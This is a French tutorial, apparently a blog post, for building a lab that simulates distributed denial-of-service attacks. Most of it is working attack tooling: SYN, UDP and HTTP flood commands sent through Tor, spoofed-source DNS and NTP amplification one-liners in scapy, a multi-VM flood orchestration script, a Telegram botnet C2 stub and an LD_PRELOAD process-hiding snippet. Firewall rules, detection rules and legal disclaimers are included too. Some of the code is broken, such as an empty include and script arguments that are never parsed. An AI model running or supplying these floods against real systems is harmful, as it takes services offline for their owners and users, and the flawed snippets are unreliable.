1️⃣ Le Chaos Contrôlé
Apache, ce tuto est ton arme pour simuler un DDoS distribué dans un lab isolé, comme un chef d’orchestre du chaos numérique. On va :
- Simuler des attaques (SYN flood, UDP flood, HTTP flood, amplification DNS).
- Utiliser Kali Linux avec hping3, slowloris, t50, GoldenEye.
- Orchestrer via un script shell avec SSH automatisé.
- Visualiser avec Python et générer un rapport PDF.
- Explorer des techniques malveillantes (lab only) : IoT, botnet C2, zero-day.
- Protéger avec iptables, Snort, Suricata.
Lab only, 100% éthique, prêt ! ⚡️💥
- Sensibilisation : Comprendre les DDoS et leurs impacts.
- Technique : Simuler et défendre avec des outils pro.
- Éthique : Lab only, respect des lois.
2️⃣ Mise en Garde Éthique
Ce tuto est strictement éducatif et doit rester en lab isolé (VirtualBox, réseau NAT). Les DDoS réels sont illégaux :
- France : Article 323-1 à 323-7 du Code pénal (7 ans de prison, 100 000 €).
- USA : CFAA (amendes, prison).
Engagement Éthique
Confirmation explicite dans le script :
# Extrait du script
echo "⚠️ LAB ONLY. Usage illégal interdit (article 323-1). Continuer ? [Y/N]"
read -r confirm
if [[ $confirm != "Y" ]]; then exit 1; fi
Logs chiffrés avec GPG :
2025-05-22 18:57:00 - IP: 192.168.56.100 - Cible: 192.168.56.103 - Action: SYN flood - Encrypted
Responsabilité : Platon-y et pctamalou.fr déclinent toute responsabilité pour un usage non éthique. Hacke propre, Apache !
3️⃣ Théorie DDoS
Un DDoS sature une cible avec du trafic pour la rendre inaccessible. Les types d’attaques :
Mécanismes
- SYN Flood : Sature les connexions TCP.
- UDP Flood : Épuise la bande passante.
- HTTP Flood : Surcharge le serveur web (Layer 7).
- Amplification DNS/NTP : Amplifie le trafic via serveurs vulnérables.
- QUIC Flood : Sature HTTP/3 (UDP).
- SSDP Amplification : Exploite IoT via UPnP.
Protocoles
- TCP : Vulnérable aux SYN floods.
- UDP : Idéal pour floods.
- ICMP : Ping flood.
Schéma ASCII
[VM1: Attaquant/Tor] --> [Switch Virtuel] --> [Metasploitable: Cible]
[VM2: Attaquant/Botnet] --> [ || ] --> [Kali: Suricata/tcpdump]
[VM3: Attaquant/IoT] --> [ || ] --> [Kali: Dashboard Python]
4️⃣ Setup du Lab
Configure un lab isolé avec VirtualBox.
Matériel et Logiciels
- VM Kali Linux 2024.4 : 3 instances (attaquants + analyseur). 4 Go RAM, 2 CPU, 20 Go disque. IP : 192.168.56.100-102.
- VM Metasploitable 3 : Cible (Ubuntu). IP : 192.168.56.103.
- Outils : nmap, hping3, slowloris, t50, GoldenEye, tcpdump, Python 3.12, matplotlib, tmux, Suricata, Snort, Wireshark, torsocks, apache2-utils, python-gnupg.
Configuration
- Installer VirtualBox : virtualbox.org.
- Configurer les VM :
- Kali 1-3 : ISO Kali 2024.4, réseau NAT (192.168.56.100-102).
- Metasploitable 3 : github.com/rapid7/metasploitable3, réseau NAT (192.168.56.103).
- Mettre à jour Kali :
sudo apt update && sudo apt upgrade -y sudo apt install nmap hping3 slowloris t50 goldeneye tcpdump python3 python3-pip snort suricata wireshark tmux torsocks apache2-utils python-gnupg -y pip3 install matplotlib - Configurer Metasploitable :
sudo systemctl start apache2 - Configurer SSH Automatisé :
# Sur chaque Kali ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa for vm in 192.168.56.100 192.168.56.101 192.168.56.102; do ssh-copy-id root@$vm; done
5️⃣ Outils et Commandes
Les armes du chaos :
Reconnaissance
nmap -sS -p- 192.168.56.103
Attaques DDoS
- SYN Flood (hping3) :
torsocks hping3 --syn -p 80 --flood 192.168.56.103 - HTTP Flood (slowloris) :
slowloris -dns 192.168.56.103 -port 80 -num-sockets 500 - UDP Flood (t50) :
t50 192.168.56.103 --protocol UDP --port 53 --flood - HTTP Flood (GoldenEye) :
goldeneye.py http://192.168.56.103 -w 500 -s 100 - Amplification DNS (scapy) :
scapy -c "send(IP(dst='192.168.56.103', src='8.8.8.8')/UDP(dport=53)/DNS(qd=DNSQR(qname='example.com', qtype='ANY')), loop=1)"
Capture
tcpdump -i eth0 host 192.168.56.103 -w capture.pcap
Benchmarking
ab -n 1000 -c 100 http://192.168.56.103/
6️⃣ Script d’Orchestration
Crée ddos_simulator_pro.sh :
#!/bin/bash
# Disclaimer éthique
echo "⚠️ LAB ONLY. Usage illégal interdit (article 323-1). Continuer ? [Y/N]"
read -r confirm
if [[ $confirm != "Y" ]]; then exit 1; fi
# Paramètres
TARGET="192.168.56.103"
PORT="80"
PROTO="tcp"
TOOL="hping3"
DURATION="30"
RATE="1000"
VMS=("192.168.56.100" "192.168.56.101" "192.168.56.102")
LOG="audit.log"
# Chiffrement logs
encrypt_log() {
gpg --encrypt --recipient admin@lab --output $LOG.gpg $LOG
mv $LOG.gpg $LOG
}
# Journal
echo "$(date) - IP: $(hostname -I) - Cible: $TARGET - Action: $TOOL" >> $LOG
encrypt_log
# Scan
nmap -sS -p- $TARGET -oN scan.log
# Botnet simulé
tmux new-session -d -s ddos
for vm in "${VMS[@]}"; do
sleep $((RANDOM % 5)) # Délais aléatoires
if [[ $TOOL == "hping3" ]]; then
tmux split-window -h "ssh $vm 'torsocks hping3 --$PROTO -p $PORT --flood $TARGET -c $RATE -d $DURATION'"
elif [[ $TOOL == "slowloris" ]]; then
tmux split-window -h "ssh $vm 'slowloris -dns $TARGET -port $PORT -num-sockets 500'"
elif [[ $TOOL == "t50" ]]; then
tmux split-window -h "ssh $vm 't50 $TARGET --protocol UDP --port 53 --flood -d $DURATION'"
elif [[ $TOOL == "goldeneye" ]]; then
tmux split-window -h "ssh $vm 'goldeneye.py http://$TARGET -w 500 -s 100'"
fi
done
# Capture
tcpdump -i eth0 host $TARGET -w capture.pcap &
# Crash simulé
ssh 192.168.56.103 'kill -9 $(pgrep apache2)'
# Attendre
sleep $DURATION
tmux kill-session -t ddos
pkill tcpdump
echo "Simulation terminée. Logs : scan.log, capture.pcap, audit.log"
encrypt_log
Usage :
chmod +x ddos_simulator_pro.sh
./ddos_simulator_pro.sh --target 192.168.56.103 --port 80 --tool hping3 --duration 30
7️⃣ Visualisation Temps Réel
Crée traffic_visualizer.py :
import matplotlib.pyplot as plt
import pandas as pd
import subprocess
import time
plt.ion()
fig, ax = plt.subplots()
packets = []
def capture_traffic():
process = subprocess.Popen(['tcpdump', '-i', 'eth0', 'host', '192.168.56.103', '-c', '100'], stdout=subprocess.PIPE)
output, _ = process.communicate()
return len(output.splitlines())
while True:
count = capture_traffic()
packets.append(count)
ax.clear()
ax.plot(packets, color='cyan', label='Paquets/100ms')
ax.set_title('Trafic DDoS en Temps Réel')
ax.set_xlabel('Temps (100ms)')
ax.set_ylabel('Paquets')
ax.legend()
plt.pause(0.1)
Usage :
python3 traffic_visualizer.py
8️⃣ Améliorations Pro
Authentification SSH Automatisée
Déjà configuré (voir section 4).
Botnets Simulés
Délais aléatoires ajoutés dans le script.
Analyse Post-Attaque
Script report_generator.py pour un rapport PDF :
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
import pandas as pd
def generate_report():
df = pd.read_csv('audit.log', names=['timestamp', 'ip', 'target', 'action'])
with PdfPages('ddos_report.pdf') as pdf:
plt.figure()
df['action'].value_counts().plot(kind='bar', color='cyan')
plt.title('Actions DDoS')
plt.xlabel('Type')
plt.ylabel('Nombre')
pdf.savefig()
plt.close()
generate_report()
Usage :
python3 report_generator.py
Détection avec Suricata
Règle custom :
alert tcp any any -> 192.168.56.103 any (msg:"SYN Flood Detected"; flags:S; threshold: type both, track by_dst, count 100, seconds 10; sid:1000002;)
Installation :
suricata -c /etc/suricata/suricata.yaml -i eth0
Chiffrement des Logs
GPG intégré dans le script.
Tor
Utilise torsocks (voir outils).
Benchmarking
Voir section 5.
Crash Simulé
Inclus dans le script.
9️⃣ Techniques Malveillantes (Lab Only)
⚠️ ATTENTION : Ces techniques sont illégales hors lab. Simule en VirtualBox uniquement !
- Exploiter IoT : Scan avec
nmap -p 80,554,8554pour simuler des caméras vulnérables. - Amplification NTP/DNS :
scapy -c "send(IP(dst='192.168.56.103', src='ntp.server')/UDP(dport=123)/NTP(), loop=1)" - Zero-Day Layer 7 : Simule une attaque HTTP/3 avec
curl --http3. - Botnet C2 :
import telegram bot = telegram.Bot(token='YOUR_TOKEN') bot.send_message(chat_id='YOUR_CHAT_ID', text='DDoS started') - BGP Hijacking : Simule avec
birden lab. - Détournement Cloud : Simule avec
docker run kali. - Phishing : Simule un email avec
swaks. - Rootkit :
# hide_process.c #include
int getpid() { return 0; } gcc -shared -fPIC hide_process.c -o hide_process.so export LD_PRELOAD=./hide_process.so
10️⃣ Défenses Pro
Iptables
iptables -A INPUT -p tcp --syn -m limit --limit 25/s -j ACCEPT
iptables -A INPUT -p udp -m limit --limit 50/s --limit-burst 100 -j ACCEPT
iptables -A INPUT -p tcp --syn -m connlimit --connlimit-above 20 -j DROP
Snort
alert tcp any any -> 192.168.56.103 any (flags: S; msg: "SYN Flood Detected"; threshold: type both, track by_dst, count 100, seconds 10; sid:1000001;)
Suricata
Voir section 8.
Wireshark
wireshark capture.pcap
# Filtre : tcp.flags.syn == 1
11️⃣ Rapport d’Attaque
Modèle :
Rapport DDoS Simulé
- Date : 2025-05-22
- Cible : 192.168.56.103
- Outils : hping3, slowloris, t50, GoldenEye
- Attaques : SYN flood, UDP flood, HTTP flood, DNS amplification
- Résultats : Serveur saturé (99% CPU, 5s latence)
- Recommandations :
- Iptables (limite SYN/UDP).
- Snort/Suricata pour alertes.
- Auditer avec Wireshark.
12️⃣ FAQ Apache
Question : Puis-je tester sur un serveur réel ?
Réponse : Non, lab only ! VirtualBox.
Question : Pourquoi pas Docker ?
Réponse : VirtualBox pour isolation max.
Question : Comment voir l’impact ?
Réponse : Wireshark, dashboard Python, rapport PDF.